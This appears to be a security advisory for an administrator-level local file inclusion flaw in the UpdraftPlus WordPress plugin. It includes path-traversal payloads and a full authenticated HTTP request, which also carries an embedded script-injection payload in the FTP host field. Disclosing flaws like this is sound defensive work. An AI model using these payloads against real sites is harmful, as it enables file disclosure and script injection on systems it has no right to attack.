UpdraftPlus < 1.16.59 – Admin+ Local File Inclusion

Description

The plugin did not validate its updraft_service settings, and using the user supplied value to include the related file, leading to a Local File Inclusion issue

Proof of Concept

Using a payload such as updraft_service[]=email/../../../../../index2 will generate the following warning: "include_once(/var/www/wordpress/wp-content/plugins/updraftplus/methods/email/../../../../../index2.php): failed to open stream: No such file or directory in /var/www/wordpress/wp-content/plugins/updraftplus/includes/class-storage-methods-interface.php on line 26

Using a payload such as updraft_service[]=email/../../../../../index and loading the settings page (/wp-admin/options-general.php?page=updraftplus) will include the index page of the blog

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/plain, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5994
Connection: close
Cookie: [admin]

action=updraft_savesettings&subaction=savesettings&nonce=9e7be07f16&settings=option_page%3Dupdraft-options-group%26_wpnonce%3D0b291f5e5b%26_wp_http_referer%3D%252Fwordpress%252Fwp-admin%252Foptions-general.php%253Fpage%253Dupdraftplus%26updraft_interval%3Dmanual%26updraftplus_starttime_files%3D%26updraft_retain%3D2%26updraft_interval_database%3Dmanual%26updraftplus_starttime_db%3D%26updraft_retain_db%3D2%26updraft_service%255B%255D%3Demail/../../../../../index%26updraft_dropbox%255Bversion%255D%3D1%26updraft_dropbox%255Bsettings%255D%255Bs-01b9089c96a4acff83609a4a5d795563%255D%255Bdummy-nosave%255D%3D0%26updraft_s3%255Bversion%255D%3D1%26updraft_s3%255Bsettings%255D%255Bs-2db08bf465a18a31dbf646e9fda57ce2%255D%255Baccesskey%255D%3D%26updraft_s3%255Bsettings%255D%255Bs-2db08bf465a18a31dbf646e9fda57ce2%255D%255Bsecretkey%255D%3D%26updraft_s3%255Bsettings%255D%255Bs-2db08bf465a18a31dbf646e9fda57ce2%255D%255Bpath%255D%3D%26updraft_cloudfiles%255Bversion%255D%3D1%26updraft_cloudfiles%255Bsettings%255D%255Bs-aece05a2401e0dbe1a67d480f826b100%255D%255Bauthurl%255D%3Dhttps%253A%252F%252Fauth.api.rackspacecloud.com%26updraft_cloudfiles%255Bsettings%255D%255Bs-aece05a2401e0dbe1a67d480f826b100%255D%255Bregion%255D%3DDFW%26updraft_cloudfiles%255Bsettings%255D%255Bs-aece05a2401e0dbe1a67d480f826b100%255D%255Buser%255D%3D%26updraft_cloudfiles%255Bsettings%255D%255Bs-aece05a2401e0dbe1a67d480f826b100%255D%255Bapikey%255D%3D%26updraft_cloudfiles%255Bsettings%255D%255Bs-aece05a2401e0dbe1a67d480f826b100%255D%255Bpath%255D%3D%26updraft_googledrive%255Bversion%255D%3D1%26updraft_googledrive%255Bsettings%255D%255Bs-1a1e514961a28aa8f790cd1a361e7c62%255D%255Bfolder%255D%3DUpdraftPlus%26updraft_onedrive%255Bversion%255D%3D1%26updraft_ftp%255Bversion%255D%3D1%26updraft_ftp%255Bsettings%255D%255Bs-23b12dfae43347f836ba1499421adbe0%255D%255Bhost%255D%3D%2522%253E%253Cscript%253Ealert(origin)%253B%253C%252Fscript%253E%253Cdiv%2520x%26updraft_ftp%255Bsettings%255D%255Bs-23b12dfae43347f836ba1499421adbe0%255D%255Buser%255D%3D%26updraft_ftp%255Bsettings%255D%255Bs-23b12dfae43347f836ba1499421adbe0%255D%255Bpass%255D%3D%26updraft_ftp%255Bsettings%255D%255Bs-23b12dfae43347f836ba1499421adbe0%255D%255Bpath%255D%3D%26updraft_ftp%255Bsettings%255D%255Bs-23b12dfae43347f836ba1499421adbe0%255D%255Bpassive%255D%3D1%26updraft_azure%255Bversion%255D%3D1%26updraft_sftp%255Bversion%255D%3D1%26updraft_googlecloud%255Bversion%255D%3D1%26updraft_backblaze%255Bversion%255D%3D1%26updraft_webdav%255Bversion%255D%3D1%26updraft_s3generic%255Bversion%255D%3D1%26updraft_s3generic%255Bsettings%255D%255Bs-ad9736737de1f8071f80fe252481dbe8%255D%255Baccesskey%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-ad9736737de1f8071f80fe252481dbe8%255D%255Bsecretkey%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-ad9736737de1f8071f80fe252481dbe8%255D%255Bpath%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-ad9736737de1f8071f80fe252481dbe8%255D%255Bendpoint%255D%3D%26updraft_s3generic%255Bsettings%255D%255Bs-ad9736737de1f8071f80fe252481dbe8%255D%255Bbucket_access_style%255D%3Dpath_style%26updraft_openstack%255Bversion%255D%3D1%26updraft_openstack%255Bsettings%255D%255Bs-2f383869cdfca7558c56385a4375c1dd%255D%255Bauthurl%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-2f383869cdfca7558c56385a4375c1dd%255D%255Btenant%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-2f383869cdfca7558c56385a4375c1dd%255D%255Bregion%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-2f383869cdfca7558c56385a4375c1dd%255D%255Buser%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-2f383869cdfca7558c56385a4375c1dd%255D%255Bpassword%255D%3D%26updraft_openstack%255Bsettings%255D%255Bs-2f383869cdfca7558c56385a4375c1dd%255D%255Bpath%255D%3D%26updraft_dreamobjects%255Bversion%255D%3D1%26updraft_dreamobjects%255Bsettings%255D%255Bs-6b30c799daffdafca381e3817a8d4698%255D%255Baccesskey%255D%3D%26updraft_dreamobjects%255Bsettings%255D%255Bs-6b30c799daffdafca381e3817a8d4698%255D%255Bsecretkey%255D%3D%26updraft_dreamobjects%255Bsettings%255D%255Bs-6b30c799daffdafca381e3817a8d4698%255D%255Bpath%255D%3D%26updraft_dreamobjects%255Bsettings%255D%255Bs-6b30c799daffdafca381e3817a8d4698%255D%255Bendpoint%255D%3Dobjects-us-east-1.dream.io%26updraft_include_plugins%3D1%26updraft_include_themes%3D1%26updraft_include_uploads%3D1%26updraft_include_uploads_exclude%3Dbackup*%252C*backups%252Cbackwpup*%252Cwp-clone%252Csnapshots%26updraft_include_uploads_exclude_entity%255B%255D%3Dbackup*%26updraft_include_uploads_exclude_entity%255B%255D%3D*backups%26updraft_include_uploads_exclude_entity%255B%255D%3Dbackwpup*%26updraft_include_uploads_exclude_entity%255B%255D%3Dwp-clone%26updraft_include_uploads_exclude_entity%255B%255D%3Dsnapshots%26updraft_include_others%3D1%26updraft_include_others_exclude%3Dupgrade%252Ccache%252Cupdraft%252Cbackup*%252C*backups%252Cmysql.sql%252Cdebug.log%26updraft_include_others_exclude_entity%255B%255D%3Dupgrade%26updraft_include_others_exclude_entity%255B%255D%3Dcache%26updraft_include_others_exclude_entity%255B%255D%3Dupdraft%26updraft_include_others_exclude_entity%255B%255D%3Dbackup*%26updraft_include_others_exclude_entity%255B%255D%3D*backups%26updraft_include_others_exclude_entity%255B%255D%3Dmysql.sql%26updraft_include_others_exclude_entity%255B%255D%3Ddebug.log%26updraft_email%3Dadmin%2540localhost.org%26updraft_split_every%3D400%26updraft_delete_local%3D1%26updraft_dir%3Dupdraft%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_service%5B%5D%3D0%26updraft_debug_mode%3D0%26updraft_ssl_useservercerts%3D0%26updraft_ssl_disableverify%3D0%26updraft_ssl_nossl%3D0%26updraft_auto_updates%3D0&updraftplus_version=1.16.56